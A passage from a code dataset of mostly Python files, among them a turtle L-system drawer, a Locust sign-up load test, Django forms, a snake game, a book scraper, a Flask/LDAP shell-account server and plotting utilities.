create the string of turtle instructions,\n# with 3 iterations and an axiom of F\ninstruction_string = create_l_system(6, \"X\")\nprint(instruction_string)\n\n# setup for drawing\nwindow = turtle.Screen()\nwindow.tracer(2)\njill = turtle.Turtle()\njill.color(\"green\")\njill.speed(0)\n\n# using screen.tracer() speeds up your drawing (by skipping some frames when drawing)\n#window.tracer(10)\n\n# move turtle to bottom and middle of screen\njill.goto(0, -200)\njill.left(90)\n\n# draw the picture, using angle 30 and segment length 2\ndraw_l_system(jill, instruction_string, 25.7, 5)\n","sub_path":"l-systems-lists.py","file_name":"l-systems-lists.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"642220468","text":"from locust import HttpUser, TaskSet, task, between\nfrom lib import flow_sign_up, flow_helper\nimport logging\n\n\nclass SignUpLoad(TaskSet):\n def on_start(self):\n logging.info(\"*** Starting Sign-Up load tests ***\")\n\n def on_stop(self):\n logging.info(\"*** Ending Sign-Up load tests ***\")\n\n \"\"\" @task() : value=3 executes 3x as often as value=1 \"\"\"\n \"\"\" Things inside task are synchronous. Tasks are async \"\"\"\n\n @task(1)\n def sign_up_load_test(self):\n # GET the root\n flow_helper.do_request(self, \"get\", \"/\", \"/\", \"\")\n\n # This performs the entire sign-up flow\n flow_sign_up.do_sign_up(self)\n\n # Should be able to get the /account page now\n flow_helper.do_request(self, \"get\", \"/account\", \"/account\", \"\")\n\n # Now log out.\n # You'd think that this would leave you at \"/\", but it returns a 204 and leaves you be.\n flow_helper.do_request(self, \"get\", \"/logout\", \"/logout\", \"\")\n\n\nclass WebsiteUser(HttpUser):\n tasks = [SignUpLoad]\n # number seconds simulated users wait between requests\n wait_time = between(5, 9)\n","sub_path":"load_testing/sign_up.locustfile.py","file_name":"sign_up.locustfile.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"330915298","text":"from django import forms\nfrom .models import Order, OrderDocument\n\nclass OrderCreateForm(forms.ModelForm):\n recipientfirstname = forms.CharField(label='Nombres',\n help_text='De la persona que recibirá los documentos.')\n recipientlastname = forms.CharField(label='Apellidos',\n help_text='De la persona que recibirá los documentos.')\n address = forms.CharField(label='Dirección',\n help_text='Utilice el idioma del país de destino en la dirección.',)\n postal_code = forms.CharField(label='Código postal')\n city = forms.CharField(label='Ciudad')\n province = forms.CharField(label='Estado, provincia o departamento')\n country = forms.CharField(label='País')\n\n class Meta:\n model = Order\n fields = ['recipientfirstname',\n 'recipientlastname',\n 'address',\n 'postal_code',\n 'city',\n 'province',\n 'country',\n ]\n widgets = {\n 'tracker':forms.HiddenInput(),\n 'status':forms.HiddenInput(),\n 'creator':forms.HiddenInput(),\n 'userfirstname':forms.HiddenInput(),\n 'userlastname':forms.HiddenInput(),\n 'email': forms.HiddenInput(),\n }\n\nclass OrderCancelForm(forms.ModelForm):\n ORDER_STATUS_CHOICES= (\n ('70', 'Anulada'),\n )\n\n status = forms.CharField()\n\n class Meta:\n model = Order\n fields = {\n 'status',\n }\n\nclass OrderDocumentForm(forms.ModelForm):\n\n doctype = forms.ChoiceField(label=\"Tipo de documento\",\n choices=OrderDocument.ORDER_DOCTYPES_CHOICES)\n description = forms.CharField(label=\"Descripción\",\n help_text='Puede colocar alguna descripción del documento si lo desea.')\n document = forms.FileField(label=\"Buscar documento\")\n\n\n class Meta:\n model = OrderDocument\n fields = ('doctype', 'description', 'document', )\n","sub_path":"orders/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"213666328","text":"#!/usr/bin/env python3\n#\n# The following code has been adapted from client_audio.py provided \n# by CONSEQUENTIAL ROBOTICS for detecting audio\n\nimport rospy\nimport numpy as np\nimport wave, struct\nimport matplotlib.pyplot as plt\nfrom audio_detection.process_audio import ProcessAudio\nfrom audio_detection.preprocessing import ProcessMiRo\n \n# sample count\nSAMPLE_COUNT = 640\t#32 ms\n\nclass RosCooDetection():\n\n\tdef listening(self, save = False, input = None):\n\t\t\n\t\t# loop\n\t\tdetected_sound = np.zeros((0, 1), 'uint16')\n\t\tprocessed_sound = np.empty(0)\n\t\ttotal_filtered_signal = np.empty(0)\n\t\t\n\t\twhile not rospy.is_shutdown():\n\n\t\t\tself.micbuf = self.mic_data.micbuf\n\t\t\tself.outbuf = self.mic_data.outbuf\n\t\t\tself.startCheck = self.mic_data.startCheck\n\n\t\t\tif self.startCheck is True and not self.outbuf is None:\n\t\t\t\t\n\t\t\t\t# get audio from left ear of Miro\n\t\t\t\tdetect_sound = np.reshape(self.outbuf[:, [1]], (-1))\n\n\t\t\t\t# downsample for playback. sample rate is set to 16000.\n\t\t\t\toutbuf = np.zeros((int(SAMPLE_COUNT / 1.25), 0), 'uint16')\n\t\t\t\ti = np.arange(0, SAMPLE_COUNT, 1.25)\n\t\t\t\tj = np.arange(0, SAMPLE_COUNT)\n\t\t\t\tx = np.interp(i, j, detect_sound[:])\n\t\t\t\toutbuf = np.concatenate((outbuf, x[:, np.newaxis]), axis=1)\n\t\t\t\toutbuf = outbuf.astype(int)\n\t\t\t\toutbuf = np.reshape(outbuf[:, [0]], (-1))\n\n\t\t\t\t# set new signal for processing\n\t\t\t\tself.processing_data.set_signal(outbuf)\n\t\t\t\tif input == None:\n\t\t\t\t\tprocessed_data, accumulation, filtered_signal = self.processing_data.process_miro_detection()\n\t\t\t\telse:\n\t\t\t\t\tprocessed_data, accumulation, filtered_signal = self.processing_data.process_miro_detection(input = input)\n\t\t\t\t# collect data from the micbuf for making audio file for re-listening later and also to graph the necessary data\n\t\t\t\tdetected_sound = np.append(detected_sound, outbuf)\t\t# audio\n\t\t\t\tprocessed_sound = np.append(processed_sound, processed_data)\t\t# ste\n\t\t\t\ttotal_filtered_signal = np.append(total_filtered_signal, filtered_signal)\t\t# filtered sound\n\t\t\t\tself.mic_data.startCheck = False # to show micbuf data has been processed\n\n\t\t\t\tif save == False:\n\t\t\t\t\treturn accumulation[len(accumulation) - 1]\n\n\t\tif save == True:\n\t\t\t# plot\n\t\t\tplt.figure(figsize=(12, 6))\n\t\t\tplt.subplot(2,2,1)\n\t\t\tplt.plot(detected_sound)\n\t\t\tplt.subplot(2,2,2)\n\t\t\tplt.plot(total_filtered_signal)\n\t\t\tplt.subplot(2,2,3)\n\t\t\tplt.plot(processed_sound)\n\t\t\tplt.subplot(2,2,4)\n\t\t\tplt.plot(accumulation)\n\t\t\tplt.show()\n\n\t\t\t# save audio file throughout the whole running process\n\t\t\toutfilename = 'tmp/client_audio.wav'\t# audio file location\n\t\t\tfile = wave.open(outfilename, 'wb')\n\t\t\tfile.setframerate(16000)\n\t\t\tfile.setsampwidth(2)\n\t\t\t\n\t\t\tprint(\"writing one CENTRE channel to file with sample length \" + str(len(detected_sound)))\n\t\t\tfile.setnchannels(1)\n\t\t\tfor s in detected_sound:\n\t\t\t\tfile.writeframes(struct.pack(' 0:\n read_size = min(remaining,chunk)\n rf.seek(remaining - read_size)\n read_buf = rf.read(read_size)\n wf.write(read_buf[::-1])\n remaining -= chunk\n\nif __name__ == \"__main__\":\n reverse_binary(\"test.tgz\")\n","sub_path":"reversebinfile3.py","file_name":"reversebinfile3.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"92552549","text":"import os\nfrom flask import Flask\nimport dotenv\nfrom flask_swagger_ui import get_swaggerui_blueprint\nimport pymysql\n\ndotenv.load_dotenv()\n\n\napp: Flask = Flask(__name__)\n\napp.config[\"SQLALCHEMY_DATABASE_URI\"] = f\"mysql+pymysql://{os.environ['db_user']}:{os.environ['db_password']}\" \\\n f\"@{os.environ['db_host']}:{os.environ['db_port']}/{os.environ['db_schema']}\"\n\napp.config[\"SQLALCHEMY_TRACK_MODIFICATIONS\"] = False\n\nswagger_url: str = '/api/docs' \nswagger_data_route: str = '/swagger-data' \nswaggerui_blueprint = get_swaggerui_blueprint(\n swagger_url, \n swagger_data_route,\n config={\n 'app_name': \"Pedregulho\"\n }\n)\napp.register_blueprint(\n swaggerui_blueprint\n)\n","sub_path":"src/Setup/API.py","file_name":"API.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"83491731","text":"import csv\nimport re\nimport sqlite3\nfrom typing import List\nimport requests\nimport lxml.html\n\ndef main():\n \"\"\"\n メインの処理。fetch(), scrape(), save()の3つの関数を呼び出す。\n \"\"\"\n url = 'https://gihyo.jp/dp'\n html = fetch(url)\n books = scrape(html, url)\n save('books.db', books)\n save_file('books.csv', books)\n\ndef fetch(url: str)-> str:\n \"\"\"\n 引数urlで与えられたURLのWebページを取得する。\n WebページのエンコーディングはConetnt-Typeヘッダーから取得する。\n 戻り値:str型のHTML\n \"\"\"\n r = requests.get(url)\n return r.text #HTTPヘッダーから取得したエンコーディングでデコードした文字列を返す\n\ndef scrape(html: str, base_url: str)-> List[dict]:\n \"\"\"\n 引数htmlで与えらえたHTMLから正規表現で書籍の情報を抜き出す。\n 引数base_urlは絶対URLに変換する際の基準となるURLを指定する。\n 戻り値:書籍(dict)のリスト\n \"\"\"\n books =[]\n html = lxml.html.fromstring(html)\n html.make_links_absolute(base_url) #すべてのa要素のhref属性を絶対URLに変換す���。\n\n #cssselect()メソッドで、セレクターに該当するa要素のリストを取得して、ここのa要素に対して処理を行う。\n #セレクターの意味:id=\"listBook\"である要素 の直接の子であるli要素 の直接の子であるitemprop=\"url\"という属性を持つa要素\n for a in html.cssselect('#listBook > li > a[itemprop=\"url\"]'):\n #a要素のhref属性から書籍のurlを取得する。\n url = a.get('href')\n\n #書籍のタイトルはitemprop=\"name\"という属性を持つp要素から取得する。\n p = a.cssselect('p[itemprop=\"name\"]')[0]\n title = p.text_content() #wbr要素などが含まれているのでtextではなくtext_contentを使う\n\n books.append({'url':url, 'title':title})\n\n return books\n\ndef save(db_path: str, books: List[dict]):\n \"\"\"\n 引数booksで与えたれた書籍のリストをSQLiteデータベースに保存する。\n データベースのパスは引数db_pathで与えられる。\n 戻り値:無し\n \"\"\"\n\n conn = sqlite3.connect(db_path)\n c = conn.cursor()\n c.execute('DROP TABLE IF EXISTS books')\n c.execute('''\n CREATE TABLE books(\n title text,\n url text\n )\n ''')\n c.executemany('INSERT INTO books VALUES(:title, :url)', books)\n\n conn.commit()\n conn.close()\n\ndef save_file(file_path: str, books: List[dict]):\n \"\"\"\n 引数booksで与えたれた書籍のリストをCSV形式のファイルに保存する。\n ファイルのパスは引数file_pathで与えられる。\n 戻り値:無し\n \"\"\"\n with open(file_path, 'w', newline='') as f:\n #第1引数にファイルオブジェクトを、第2引数にフィールド名のリストを指定する。\n writer = csv.DictWriter(f, ['url', 'title'])\n writer.writeheader() #1行目のヘッダーを出力する\n #writerows()で複数の行を1度に出力する。引数は辞書のリスト。\n writer.writerows(books)\n\n#pythonコマンドで実行された場合にmain()関数を呼び出す。これはモジュールとして他のファイルから\n#インポートされたときに、mail()関数が実行されないようにするための、pythonにおける一般的なイディオム。\nif __name__ == '__main__':\n main()","sub_path":"python_scraper.py","file_name":"python_scraper.py","file_ext":"py","file_size_in_byte":3543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"54324862","text":"#!/usr/bin/python2.7\n\nimport os\nimport sys\nimport traceback\nimport ldap\nimport ssl\nfrom flask import Flask, send_file, send_from_directory, redirect, request, make_response\nfrom flask.ext.restful import Resource, Api\nfrom flask.ext.restful.reqparse import RequestParser\nfrom tornado.wsgi import WSGIContainer\nfrom tornado.httpserver import HTTPServer\nfrom tornado.ioloop import IOLoop\nfrom provisor import Provisor\nfrom provisor.provisor import UNKNOWN_HOST\nfrom provisor.utils import validate_pubkey as pubkey\nfrom provisor.utils import validate_username as username\n\napp = Flask(__name__)\napp.config['RESTFUL_JSON'] = {\"indent\": 4}\n\napi = Api(app)\n\np = Provisor(\n uri=\"ldap://ldap.hashbang.sh\",\n user=\"cn=provisor,ou=Admin,dc=hashbang,dc=sh\",\n password=os.environ['LDAP_PASSWORD'],\n user_base=\"ou=People,dc=hashbang,dc=sh\",\n group_base=\"ou=Group,dc=hashbang,dc=sh\",\n servers_base=\"ou=Servers,dc=hashbang,dc=sh\",\n)\n\ncertfile = os.path.join(os.getcwd(), \"certs/server.crt\")\nkeyfile = os.path.join(os.getcwd(), \"certs/server.key\")\nhttps_port = 4443\nhttp_port = 8080\n\n\n@api.representation('text/plain')\ndef output_plain(data, code, headers=None):\n lines = []\n for server, stats in data.items():\n line = [server]\n for key, val in stats.items():\n line.append(str(val))\n lines.append(\"|\".join(line))\n data = \"\\n\".join(lines)\n resp = make_response(data, code)\n resp.headers.extend(headers or {})\n return resp\n\n\nclass UserCreate(Resource):\n def __init__(self):\n self.reqparse = RequestParser()\n self.reqparse.add_argument(\n 'user',\n type = username,\n required = True,\n location = 'json'\n )\n self.reqparse.add_argument(\n 'key',\n type = pubkey,\n required = True,\n location = 'json'\n )\n self.reqparse.add_argument(\n 'host',\n type = str,\n required = True,\n location = 'json'\n )\n super(UserCreate, self).__init__()\n\n def post(self):\n args = self.reqparse.parse_args()\n print(args)\n\n try:\n p.add_user(\n username=str(args['user']),\n pubkey=args['key'],\n hostname=args['host']\n )\n except ldap.SERVER_DOWN:\n return {'message': 'Unable to connect to LDAP server'}, 400\n except ldap.ALREADY_EXISTS:\n return {'message': 'User already exists'}, 400\n except UNKNOWN_HOST:\n return {'message': 'Unknown shell server'}, 400\n except:\n (typ, value, tb) = sys.exc_info()\n sys.stderr.write(\"Unexpected Error: %s\\n\" % typ)\n sys.stderr.write(\"\\t%s\\n\" % value)\n traceback.print_tb(tb)\n return {'message': 'User creation script failed'}, 400\n\n return {'message': 'success'}\n\n\nclass ServerStats(Resource):\n LOCATIONS = {\n \"da1.hashbang.sh\": {\"lat\": 32.8, \"lon\": -96.8},\n \"ny1.hashbang.sh\": {\"lat\": 40.7, \"lon\": -74},\n \"sf1.hashbang.sh\": {\"lat\": 37.8, \"lon\": -122.4},\n \"to1.hashbang.sh\": {\"lat\": 43.7, \"lon\": -79.4}\n }\n\n def get(self, out_format='json'):\n try:\n server_stats = p.server_stats()\n except ldap.SERVER_DOWN:\n return {'message': 'Unable to connect to LDAP server'}, 400\n\n for s in server_stats.keys():\n if s in self.LOCATIONS.keys():\n server_stats[s]['coordinates'] = self.LOCATIONS[s]\n\n return server_stats\n\n\napi.add_resource(UserCreate, '/user/create')\napi.add_resource(ServerStats, '/server/stats')\n\n\ndef security_headers(response, secure=False):\n csp = \"default-src 'none'; \" \\\n \"style-src https://fonts.googleapis.com 'self'; \" \\\n \"font-src https://fonts.gstatic.com; \" \\\n \"img-src data:; script-src 'self'; \" \\\n \"sandbox allow-same-origin allow-scripts; \" \\\n \"frame-ancestors 'none'\"\n\n response.headers['Content-Security-Policy'] = csp\n response.headers['Referrer-Policy'] = 'no-referrer'\n response.headers['X-Content-Type-Options'] = 'nosniff'\n response.headers['X-Frame-Options'] = 'DENY'\n response.headers['X-XSS-Protection'] = '1; mode=block'\n\n if secure:\n response.headers['Strict-Transport-Security'] = 'max-age=31536000'\n\n return response\n\n\n@app.route('/', methods=[\"GET\"])\ndef root():\n useragent = request.headers.get('User-Agent')\n has_https = 'https_server' in globals()\n\n if 'curl' in useragent and not request.is_secure:\n resp = send_from_directory('static', 'warn.sh.asc')\n elif not has_https or request.is_secure:\n resp = send_from_directory('static', 'index.html')\n else:\n return redirect(request.url.replace(\"http://\", \"https://\"))\n\n return security_headers(resp, secure=request.is_secure)\n\n\n@app.route('/LICENSE.md', methods=['GET'])\ndef license():\n return security_headers(send_file('LICENSE.md', mimetype='text/markdown'),\n secure=request.is_secure)\n\n# HE.net domain validation\n@app.route('/s73rmwh.txt', methods=['GET'])\ndef he_net():\n return security_headers(make_response('Hello IPv6!'),\n secure=request.is_secure)\n\n@app.route('/assets/', methods=['GET'])\ndef assets(filename):\n return security_headers(send_from_directory('src', filename),\n secure=request.is_secure)\n\nif __name__ == '__main__':\n\n if os.path.isfile(certfile) and os.path.isfile(keyfile):\n ssl_ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)\n ssl_ctx.load_cert_chain(certfile, keyfile)\n\n # Protocol options: allow TLSv1.1 and later\n ssl_ctx.options |= ssl.OP_NO_SSLv2\n ssl_ctx.options |= ssl.OP_NO_SSLv3\n ssl_ctx.options |= ssl.OP_NO_TLSv1\n\n # Cipher options: strong ciphers, follow server preferences\n ssl_ctx.set_ciphers(\"ECDHE-RSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-RSA-AES128-SHA256:ECDHE-RSA-AES256-SHA384\")\n ssl_ctx.options |= ssl.OP_CIPHER_SERVER_PREFERENCE\n\n # Key exchange: strong prime curve, no point reuse\n ssl_ctx.set_ecdh_curve('prime256v1')\n ssl_ctx.options |= ssl.OP_SINGLE_ECDH_USE\n\n https_server = HTTPServer(\n WSGIContainer(app),\n ssl_options=ssl_ctx\n )\n https_server.listen(https_port)\n\n http_server = HTTPServer(WSGIContainer(app))\n http_server.listen(http_port)\n IOLoop.instance().start()\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":6635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"611556552","text":"from typing import Any, Tuple, Union\n\nimport numpy as np\nfrom random import randint\n\nnum1 = randint(1, 10)\nnum2 = randint(1, 10)\n# assert isinstance(num2, int)\nx = int(np.lcm(num1, num2))\n\nprint(num1)\nprint(num2)\nprint(int(x))\n\nnum1 = int(input(\"Type your first no.: \"))\nnum2 = int(input(\"Type your second no.: \"))\n\nx = np.lcm(num1, num2)\nprint(x)\n","sub_path":"function_5.py","file_name":"function_5.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"90057297","text":"import pygame as engine\nfrom os import path\n\n## pegar o diretorio do arquivo\nroot = path.dirname(path.abspath(__file__)) + \"\\\\\"\n\n## inicia tudo do pygame\nengine.init()\n\nengine.display.set_caption(\"Snek\")\n\n## pega informaçao do display\ngetRes = engine.display.Info()\n\nconfig = open(root+\"config.ini\", \"r\")\nfull = config.readline()\n\nflags = engine.FULLSCREEN | engine.DOUBLEBUF | engine.HWSURFACE\n\nif \"1\" in full:\n resolucao = [int(getRes.current_w), int(getRes.current_h)]\n tela = engine.display.set_mode(resolucao, flags)\n \nelse:\n resolucao = [int(getRes.current_w / 1.5), int(getRes.current_h / 1.5)]\n flags = engine.DOUBLEBUF | engine.HWSURFACE\n\n tela = engine.display.set_mode(resolucao, flags)\n\nconfig.close()\n\ntela.set_alpha(None)\n\nposCaixa = []\nfor i in range(1, 21):\n posCaixa.append((resolucao[1] / 20) * i)\n\n\ncaixaScores = []\nfor i in range(1, 19):\n caixaScores.append((resolucao[1] / 18) * i)\n\n## definindo relogio como uma variável para ficar mais fácil\nrelogio = engine.time.Clock()\n\n## o delay para repetir as teclas quando o usuario segurar elas\nengine.key.set_repeat(200, 50)\n\n\nlimiteFps = 120\n\n## define o tamanho da cobra de acordo com o display\n## nesse caso o tamanho eh 2% do tamanho do display\ntam = [int(resolucao[0] * 0.02)] * 2\n\ntamComida = tam\n\n## [0, 1] sao as posiçoes da cobra e [2, 3] eh o tamanho\nrectPlayer = [(resolucao[0] // 2) - tam[0] // 2, (resolucao[1] // 2) - tam[1] // 2, tam[0], tam[1]]\n\n## calcula a velocidade da cobra com base no tamanho do player\n## vel eh 20% do tamanho\nvel = tam[0] * 0.2\n\n# o delay q a calda vai ter\n# para pegar a posicao do player\ndelayCalda = 1\ntamInicial = 10\n\nbg = 10, 10, 10\nbranco = 255, 255, 255\nvermelho = 255, 100, 100\nverde = 0, 255, 102\nverde2 = 92, 255, 158\nverde3 = 149, 255, 192\nverde4 = 205, 255, 226\nazul = 157, 198, 255\nhighlight = 150, 150, 150\n\n## a variavel q vai definir pra onde a cobra vai se mexer\ndirecao = \"nulo\"\n\n## tipo de fonte e tamanho dela\nfonte = engine.font.Font(root+\"Font\\\\Font2.otf\", int(resolucao[0] * 0.0225))\nfonteArr = engine.font.Font(root+\"Font\\\\Font2.otf\", int(resolucao[0] * 0.026))\nfonteTitulo = engine.font.Font(root+\"Font\\\\Font2.otf\", int(resolucao[0] * 0.0565))\nultra = engine.font.Font(root+\"Font\\\\Font2.otf\", int(resolucao[0] * 0.07))\n\n## fazer um texto predefinido para renderizar depois\nrestart = fonte.render(\"R = Reset\", True, branco)\n\n## posição do texto de restart\nposRestart = (resolucao[0] / 2) - restart.get_size()[0] / 2, resolucao[1] - restart.get_size()[1]\n\n\nsair = fonte.render(\"ESC = Menu\", True, branco)\n\nposSair = (resolucao[0] / 2 - sair.get_size()[0] / 2, posRestart[1] - sair.get_size()[1])\n\n\nultra = ultra.render(\"Ultra Snake\", True, branco)\n\n## pra resetar o jogo se o usuario\n## apertar R\nreset = True\n\n## pra informar que o jogo acabou\nfim = True\n\nupload = False\n","sub_path":"Defaults.py","file_name":"Defaults.py","file_ext":"py","file_size_in_byte":2832,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"458828242","text":"from torchvision import transforms, datasets\n\nfrom base import BaseDataLoader\n\n\nclass Cifar10DataLoader(BaseDataLoader):\n\n def __init__(self, data_dir, batch_size, shuffle=True, validation_split=0.0, num_workers=1, training=True,\n img_size=32):\n trsfm = transforms.Compose([\n transforms.Resize(img_size),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))]\n )\n self.data_dir = data_dir\n self.dataset = datasets.CIFAR10(self.data_dir, train=training, download=True, transform=trsfm)\n super().__init__(self.dataset, batch_size, shuffle, validation_split, num_workers)\n","sub_path":"data_loader/cifar100_data_loader.py","file_name":"cifar100_data_loader.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"246671923","text":"for _ in range (int(input())):\n person=int(input())\n arr=list(map(int,input().split()))\n end=arr[0]\n start=1\n sum=arr[0]\n person-=1\n day=0\n while person>0:\n for i in range(start,end):\n sum+=arr[i]\n start=end\n end=sum\n person-=sum\n day+=1\n print(day)","sub_path":"spread the word.py","file_name":"spread the word.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"413753558","text":"import math\n\nfrom PySide import QtCore, QtGui\n\nfrom matplotlib.figure import Figure\nfrom matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as FigureCanvas\nfrom matplotlib.backends.backend_qt4agg import NavigationToolbar2QT as NavigationToolbar\nfrom matplotlib.backend_bases import key_press_handler\n\nclass MyFigure(Figure, QtCore.QThread):\n def __init__(self, parent, *args, **kwargs):\n QtCore.QThread.__init__(self, parent)\n Figure.__init__(self, *args, **kwargs)\n\n self.plot_data = list()\n self.figures = list()\n\n def start_plotting_thread(self, plot_data, on_finish=None):\n \"\"\" Start plotting \"\"\"\n self.plot_data = plot_data\n if len(self.figures) == 0:\n self.setup_subplot()\n \n\n\n if on_finish is not None:\n self.finished.connect(on_finish)\n\n self.start()\n\n def setup_subplot(self):\n \"\"\" Run as a thread \"\"\"\n # Figure out rows and columns\n total_plots = len(self.plot_data)\n\n columns = int(math.sqrt(total_plots))\n if columns < 1:\n columns = 1\n\n rows = int(total_plots / columns)\n if (total_plots % columns) > 0:\n rows += 1\n if rows < 1:\n rows = 1\n\n # Plot Data\n for plot_index, _plot_data in enumerate(self.plot_data):\n plot_number = plot_index + 1\n args = (rows, columns, plot_number)\n kwargs = {\n 'title': _plot_data['title'],\n 'xlabel': _plot_data['xlabel'],\n 'ylabel': _plot_data['ylabel']\n }\n\n figure = self.add_subplot(*args, **kwargs)\n\n figure.plot(_plot_data['x'], _plot_data['y'], '.b')\n\n self.figures.append(figure)\n\n self.subplots_adjust(hspace=0.5, wspace=0.4) \n\n def run(self):\n for i, pd in enumerate(self.plot_data):\n self.figures[i].plot(pd['x'], pd['y'], '.b')\n\n\n\nclass PlotDialog(QtGui.QDialog):\n def __init__(self, parent):\n \n QtGui.QDialog.__init__(self, parent, QtCore.Qt.WindowMinMaxButtonsHint | QtCore.Qt.WindowCloseButtonHint)\n\n self.figure = MyFigure(self)\n self.canvas = FigureCanvas(self.figure)\n self.toolbar = NavigationToolbar(self.canvas, self)\n\n self.layout = QtGui.QGridLayout()\n self.setLayout(self.layout)\n\n layout = [\n [self.toolbar],\n [self.canvas], \n ]\n\n for row_index, columns in enumerate(layout):\n if type(columns) is list:\n for column_index, widget in enumerate(columns):\n if widget is not None:\n self.layout.addWidget(widget, row_index, column_index)\n\n self.canvas.mpl_connect('key_press_event', lambda event:key_press_handler(event, self.canvas, self.toolbar))\n\n def draw_plots(self, plot_data):\n \"\"\" Plot Plots \"\"\"\n self.figure.start_plotting_thread(plot_data, on_finish=self.finish_drawing_plots)\n\n def finish_drawing_plots(self):\n \"\"\" Finish drawing plots \"\"\"\n self.canvas.draw()\n self.show()\n\nimport sys\nif __name__ == \"__main__\":\n qApp = QtGui.QApplication(sys.argv)\n w = QtGui.QWidget()\n p = PlotDialog(w)\n p.draw_plots([{'title': 'Port 0',\n 'xlabel': 't(s)',\n 'ylabel': 'Pressure(Pa)',\n 'x' : [1,2],\n 'y' : [1,2]},\n {'title': 'Port 1',\n 'xlabel': 't(s)',\n 'ylabel': 'Pressure(Pa)',\n 'x' : [1,2],\n 'y' : [1,2]},\n {'title': 'Port 2',\n 'xlabel': 't(s)',\n 'ylabel': 'Pressure(Pa)',\n 'x' : [1,2],\n 'y' : [1,2]},\n {'title': 'Port 3',\n 'xlabel': 't(s)',\n 'ylabel': 'Pressure(Pa)',\n 'x' : [1,2],\n 'y' : [1,2]},\n {'title': 'Port 0',\n 'xlabel': 't(s)',\n 'ylabel': 'Pressure(Pa)',\n 'x' : [1,2],\n 'y' : [1,2]},\n ])\n w.setWindowTitle('Scanner...')\n sys.exit(qApp.exec_())\n\n \n","sub_path":"more_plot.py","file_name":"more_plot.py","file_ext":"py","file_size_in_byte":4478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"198136910","text":"import wx\nfrom Components.SettingsHelpers import *\n\nclass OverviewValsPanel(wx.Panel):\n def __init__(self,parent, stats, streamname):\n super(OverviewValsPanel, self).__init__(parent)\n\n self.tablewidth = 360\n\n sb = wx.StaticBox(self, label=streamname)\n sbs = wx.StaticBoxSizer(sb, orient=wx.VERTICAL) \n self.list = wx.ListCtrl(self, -1, style=wx.LC_REPORT,size=(self.tablewidth+30,100))\n self.list.InsertColumn(0,\"Stat\");\n self.list.SetColumnWidth(0,self.tablewidth/2)\n self.list.InsertColumn(1,\"Value\");\n self.list.SetColumnWidth(1,self.tablewidth/2)\n \n\n idCounter = 0\n\n for k,v in stats.items():\n self.list.InsertStringItem(idCounter, k)\n self.list.SetStringItem(idCounter, 1, str(v))\n idCounter+=1\n\n sbs.Add(self.list,flag=wx.EXPAND)\n self.SetSizer(sbs)\n\n\n\n\n\n","sub_path":"Vicarious/Vicarious/Application/Components/Dialogs/OverviewValsPanel.py","file_name":"OverviewValsPanel.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"45232022","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 22 15:26:15 2020\n\n@author: Mathew\n\"\"\"\nfname =''\ndata = {}\nf = open('fname','r')\nlines = f.readlines()\nf.close()\n\n\nfor line in lines:\n cs = line.split(',')\n data[cs[0]] = cs[1:]","sub_path":"csv.py","file_name":"csv.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"498045140","text":"import typing\nimport pyecore.ecore as Ecore\nfrom functools import lru_cache, wraps\nfrom pyecore.notification import EObserver\n\n\nclass ResultObserver(EObserver):\n def notifyChanged(self, notif):\n print(notif)\n\n\nclass EObjectProxy(object):\n def __init__(self, instance):\n object.__setattr__(self, 'wrapped', instance)\n object.__setattr__(self, 'wrapped_eClass', instance.eClass)\n\n def __getattribute__(self, name):\n wrapped = object.__getattribute__(self, 'wrapped')\n eClass = object.__getattribute__(self, 'wrapped_eClass')\n result = getattr(wrapped, name)\n if eClass.findEStructuralFeature(name):\n print('access', name, ':', result, 'for', wrapped)\n return result\n\n def __setattr__(self, name, value):\n wrapped = object.__getattribute__(self, 'wrapped')\n if isinstance(value, EObjectProxy):\n value = object.__getattribute__(value, 'wrapped')\n return setattr(wrapped, name, value)\n\n def __str__(self):\n wrapped = object.__getattribute__(self, 'wrapped')\n return wrapped.__str__()\n\n\ndef mapping(f):\n f.__mapping__ = True\n result_var_name = 'result'\n f.self_eclass = typing.get_type_hints(f).get('self')\n if f.self_eclass is None:\n raise ValueError(\"Missing 'self' parameter for mapping: '{}'\"\n .format(f.__name__))\n f.result_eclass = typing.get_type_hints(f).get('return')\n\n @wraps(f)\n def inner(*args, **kwargs):\n if f.result_eclass is None:\n index = f.__code__.co_varnames.index('self')\n result = kwargs.get('self', args[index])\n elif f.result_eclass is Ecore.EClass:\n result = f.result_eclass('TMP')\n else:\n result = f.result_eclass()\n inputs = [a for a in args if isinstance(a, Ecore.EObject)]\n 